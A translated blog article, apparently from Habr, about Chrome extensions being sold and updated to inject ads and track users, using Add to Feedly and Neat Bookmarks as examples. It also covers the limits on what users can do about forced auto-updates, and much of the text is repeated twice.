Surprise from the unknown: trust in Chrome extensions
On January 16, Amit Agarwal, the developer of the Add to Feedly extension, published a blog post admitting that its extension was sold to an unknown person for a sum of several thousand dollars ("a four-digit offer").
Add to Feedly is an extension that added a convenient button to subscribe to the RSS feed of the current page via the Feedly service (a popular alternative to the deceased Google Reader). The expansion was done by Amit in an hour and gathered 30,000 users in the Chrome store. The extension was sold, the money was received through PayPal, and Amit transferred the rights to the extension to another Google account.
A month later, the new owners sent an update to the Chrome store. No new features, no bug fixes. Adding ads only to all pages that the user views. All links on each site turned into referral, for which ads were thrown out. In addition, the new owners were able to track all user transitions. Simply put, Chrome's auto-update downloaded the malicious code directly into 30,000 accounts, and the Chrome Sync sync distributed it across every connected computer with Google Chrome, Chromium or Chrome OS installed.
')
The problem of malicious updates has been around for a long time and is not limited to Chrome. Mozilla Firefox also had similar scandals. But there is a significant difference: in the Mozilla Extensions section, each update is manually checked by moderators, while Chrome Store assumes that its developers already trust the application developer. In addition, the rules of Mozilla require you to provide source code extensions for review, unlike the rules of the Chrome Store. In addition, extensions on Chrome may already include compiled Native Client code.
You can be sure that Google is fighting and will fight the malicious code that is sent to the Google Store, and your favorite music grabber will not slip the phishing page. But still the question of advertising.
Imagine that the developer decided to make money on his extension. He negotiates with the ad network and uploads an update that includes advertising or collecting (anonymous) statistics. Or he sells the extension, and then someone else includes advertising or collecting statistics - it is not so important to the user. The important thing is that tomorrow you open a browser and see a new advertisement on familiar sites. In Chrome, you can not roll back to the previous version or disable the update, you can only completely disable the familiar script.
Monetization of extensions due to advertising is a safe and legal method that is actively used in development. We can confidently say that there will be no prohibition of advertising in Google extensions: many applications and extensions live only on this. But how many links and banners are you willing to endure for the sake of convenient and familiar functionality?
Reddit users have compiled a list of extensions that insert advertisements into the pages (including replacing native banners with theirs), monitor their users (anonymously or explicitly), or simply behave “meanly”. Part of the list (for example, Add to Feedly) has already been removed from the Chrome Store.
Let us examine for example the extension Neat Bookmarks. It allows you to conveniently manage bookmarks in the browser, while having support for interfaces for the visually impaired and keyboard control. We are interested in the fact that it is distributed with affiliate advertising. Advertising is enabled by default, and a separate paragraph on the page that opens after installing the extension informs about it.
In the settings of Neat Bookmarks there is also a tick to turn off advertising - but when you try to click on it, a page with a request for donation opens. Only on it the user learns that advertising is turned off only after a donation (of any amount) through PayPal. Thus, the user brings revenue to the developers - directly or indirectly, of which he is aware - after installation. If you do not read the pages after installation and do not look at the extension settings, you will not know about this included code before it works. The income from the expansion goes to unknown persons who bought the extension last year.
There is an open source ad-free fork called Neater Bookmarks - but it has far fewer users, which means it ranks second in search results.
You can check extensions only after installation by viewing their source code, while the user has the task of decrypting compressed JavaScript files — often with unchanged string variables (where addresses for “calls” are stored), but sometimes specially obfuscated. Extensions using the Native Client (and in the future there will be more) will require special study and debugging. There are also extensions for Firefox and Chrome, which notify about new versions of installed widgets.
People who understand Javascript can use the Userscripts.org archive as a source of alternative extensions. The scripts on this site do not pass any filters (which means there are a lot of dangerous code and it is assumed that you personally read the code of everything you put), but you can read the code before installation. If you install scripts through the TamperMonkey extension, then you can configure auto-update (TM warns you about new versions and may ask you before installing).
Unfortunately, this is all that advanced users can do. Google Store is tightly connected to Google Chrome. The auto-update process is not disabled (unlike Mozilla Firefox, where there is an option to manually update the extensions). If you install an extension, you unconditionally trust its developers — now and in the future, to current and future developers. If you are asked for your data on habr.ru, then you should be ready to provide all data from habr.ru. With no exceptions.
Add to Feedly is an extension that added a convenient button to subscribe to the RSS feed of the current page via the Feedly service (a popular alternative to the deceased Google Reader). The expansion was done by Amit in an hour and gathered 30,000 users in the Chrome store. The extension was sold, the money was received through PayPal, and Amit transferred the rights to the extension to another Google account.
A month later, the new owners sent an update to the Chrome store. No new features, no bug fixes. Adding ads only to all pages that the user views. All links on each site turned into referral, for which ads were thrown out. In addition, the new owners were able to track all user transitions. Simply put, Chrome's auto-update downloaded the malicious code directly into 30,000 accounts, and the Chrome Sync sync distributed it across every connected computer with Google Chrome, Chromium or Chrome OS installed.
')
The problem of malicious updates has been around for a long time and is not limited to Chrome. Mozilla Firefox also had similar scandals. But there is a significant difference: in the Mozilla Extensions section, each update is manually checked by moderators, while Chrome Store assumes that its developers already trust the application developer. In addition, the rules of Mozilla require you to provide source code extensions for review, unlike the rules of the Chrome Store. In addition, extensions on Chrome may already include compiled Native Client code.
Alternatively honest monetization
You can be sure that Google is fighting and will fight the malicious code that is sent to the Google Store, and your favorite music grabber will not slip the phishing page. But still the question of advertising.
Imagine that the developer decided to make money on his extension. He negotiates with the ad network and uploads an update that includes advertising or collecting (anonymous) statistics. Or he sells the extension, and then someone else includes advertising or collecting statistics - it is not so important to the user. The important thing is that tomorrow you open a browser and see a new advertisement on familiar sites. In Chrome, you can not roll back to the previous version or disable the update, you can only completely disable the familiar script.
Monetization of extensions due to advertising is a safe and legal method that is actively used in development. We can confidently say that there will be no prohibition of advertising in Google extensions: many applications and extensions live only on this. But how many links and banners are you willing to endure for the sake of convenient and familiar functionality?
Reddit users have compiled a list of extensions that insert advertisements into the pages (including replacing native banners with theirs), monitor their users (anonymously or explicitly), or simply behave “meanly”. Part of the list (for example, Add to Feedly) has already been removed from the Chrome Store.
Let us examine for example the extension Neat Bookmarks. It allows you to conveniently manage bookmarks in the browser, while having support for interfaces for the visually impaired and keyboard control. We are interested in the fact that it is distributed with affiliate advertising. Advertising is enabled by default, and a separate paragraph on the page that opens after installing the extension informs about it.
In the settings of Neat Bookmarks there is also a tick to turn off advertising - but when you try to click on it, a page with a request for donation opens. Only on it the user learns that advertising is turned off only after a donation (of any amount) through PayPal. Thus, the user brings revenue to the developers - directly or indirectly, of which he is aware - after installation. If you do not read the pages after installation and do not look at the extension settings, you will not know about this included code before it works. The income from the expansion goes to unknown persons who bought the extension last year.
There is an open source ad-free fork called Neater Bookmarks - but it has far fewer users, which means it ranks second in search results.
What to do?
You can check extensions only after installation by viewing their source code, while the user has the task of decrypting compressed JavaScript files — often with unchanged string variables (where addresses for “calls” are stored), but sometimes specially obfuscated. Extensions using the Native Client (and in the future there will be more) will require special study and debugging. There are also extensions for Firefox and Chrome, which notify about new versions of installed widgets.
People who understand Javascript can use the Userscripts.org archive as a source of alternative extensions. The scripts on this site do not pass any filters (which means there are a lot of dangerous code and it is assumed that you personally read the code of everything you put), but you can read the code before installation. If you install scripts through the TamperMonkey extension, then you can configure auto-update (TM warns you about new versions and may ask you before installing).
Unfortunately, this is all that advanced users can do. Google Store is tightly connected to Google Chrome. The auto-update process is not disabled (unlike Mozilla Firefox, where there is an option to manually update the extensions). If you install an extension, you unconditionally trust its developers — now and in the future, to current and future developers. If you are asked for your data on habr.ru, then you should be ready to provide all data from habr.ru. With no exceptions.
Source: https://habr.com/ru/post/209600/
All Articles